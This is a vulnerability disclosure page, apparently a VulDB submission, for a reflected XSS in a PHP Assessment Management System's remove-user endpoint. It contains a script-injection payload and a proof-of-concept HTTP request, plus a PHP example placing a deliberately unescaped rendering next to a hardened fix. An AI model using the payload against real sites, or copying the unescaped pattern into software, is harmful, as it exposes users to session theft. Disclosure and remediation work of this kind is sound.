| Title | Assessment Management System admin/remove-user.php Reflected XSS Vulnerability v1.0 Reflected XSS |
|---|
| Description | # Assessment Management System admin/remove-user.php Reflected XSS Vulnerability
A reflected cross-site scripting (XSS) vulnerability exists in the `admin/remove-user.php` file of the Assessment
Management System. The application reflects user-controlled input from the `id` parameter into an HTML attribute
without proper output encoding. As a result, an attacker can inject arbitrary JavaScript that executes in the
browser of a victim who visits a crafted URL.
## Impact of the Vulnerability
This vulnerability may allow an attacker to execute arbitrary JavaScript in the browser of a logged-in administrator
or other authenticated user. Successful exploitation may lead to session theft, unauthorized actions, sensitive
information disclosure, or account compromise within the application context.
## Payload
```
"><ScRiPt>alert(1)</sCrIpT>
```
## Proof of Concept
Send the following request to the vulnerable endpoint:
```http
GET /admin/remove-user.php?id="><ScRiPt>alert(1)</sCrIpT> HTTP/1.1
Host: assessment
Cookie: PHPSESSID=f11os756ltsdgbtk776pklo8cs
```
The application reflects the `id` parameter into the `value` attribute of the Username field without HTML escaping:
```html
<input class="form-control" type="text" value="\"><ScRiPt>alert(1)</sCrIpT>" readonly>
```
The injected double quote closes the original `value` attribute, and the following `<script>` element is interpreted
by the browser as executable HTML/JavaScript. This confirms the presence of a reflected XSS vulnerability in
`admin/remove-user.php`.
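The following PHP is an added example for this page, not the advisory's text and not the Assessment Management System's own source (the advisory shows the reflected HTML, not the PHP that produces it). It reconstructs the rendering behaviour the report describes, writing the raw `id` value into the `value` attribute, and places the hardened form next to it. The function names, the `SAMPLE_ID` constant and the assumption that `id` is a numeric user record key are all mine.

```php
<?php
// Added example: reconstructs the vulnerable rendering described in the
// advisory and shows the attribute-context encoding that fixes it. Function
// names are hypothetical; this is not the project's code.
declare(strict_types=1);

// Constructed input: the reflected value from the advisory's proof of concept.
const SAMPLE_ID = '"><ScRiPt>alert(1)</sCrIpT>';

// Vulnerable pattern (reconstructed): the parameter is concatenated straight
// into the attribute. The backslash visible in the report's reflected output
// (addslashes()-style escaping) is not an HTML escape and changes nothing: the
// browser still ends the attribute at the first `"`.
function renderUsernameFieldVulnerable(string $id): string
{
    return '<input class="form-control" type="text" value="' . $id . '" readonly>';
}

// Hardened pattern: encode for the HTML attribute context at the point of
// output. ENT_QUOTES turns `"` into `&quot;` so the attribute cannot be closed
// early, and `<` / `>` become `&lt;` / `&gt;` so no element can be opened.
function renderUsernameFieldSafe(string $id): string
{
    $encoded = htmlspecialchars($id, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    return '<input class="form-control" type="text" value="' . $encoded . '" readonly>';
}

// Defence in depth (assumption: `id` is a numeric user record key). Rejecting
// anything that is not a plain integer before it reaches the template keeps
// the payload out of the page even if an encoding step is missed elsewhere.
function parseUserId(string $raw): ?int
{
    return ctype_digit($raw) ? (int) $raw : null;
}

// Regression check a test suite can run: a raw `<script` token must never
// survive in the rendered field.
function containsRawScriptTag(string $html): bool
{
    return (bool) preg_match('/<\s*script/i', $html);
}

$id = $argv[1] ?? SAMPLE_ID;

echo "vulnerable: " . renderUsernameFieldVulnerable($id) . "\n";
echo "hardened:   " . renderUsernameFieldSafe($id) . "\n";
echo "raw <script> in vulnerable output: "
    . var_export(containsRawScriptTag(renderUsernameFieldVulnerable($id)), true) . "\n";
echo "raw <script> in hardened output:   "
    . var_export(containsRawScriptTag(renderUsernameFieldSafe($id)), true) . "\n";

if (parseUserId($id) === null) {
    echo "validation: rejected (not a numeric user id)\n";
}
```

Run it with `php example.php` (or pass a different value as the first argument). With the sample input the vulnerable line reproduces the advisory's reflected markup, while the hardened line renders the payload as inert text (`&quot;&gt;&lt;ScRiPt&gt;...`). `ENT_QUOTES` matters because the default `htmlspecialchars()` flags leave single quotes alone, which is not enough for single-quoted attributes; validating the id as an integer is the second layer, since a user-removal endpoint has no reason to accept anything else.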
## Source Download
[Assessment Management In PHP With Source Code - Source Code & Projects](https://code-projects.org/assessment-management-in-php-with-source-code/) |
|---|
| Source | ⚠️ https://github.com/zzzxc643/CVE1/blob/main/assessment/vul4.md |
|---|
| User | SSL_Seven_Security_Lab_WangZhiQiang_ZhanXiuChen (UID 97200) |
|---|
| Submitted | 2026. 06. 03. AM 07:07 (1 month ago) |
|---|
| Moderation | 2026. 07. 03. PM 08:50 (1 month later) |
|---|
| Status | Accepted |
|---|
| VulDB Entry | 376170 [code-projects Assessment Management 1.0 /admin/remove-user.php id cross site scripting] |
|---|
| Points | 20 |
|---|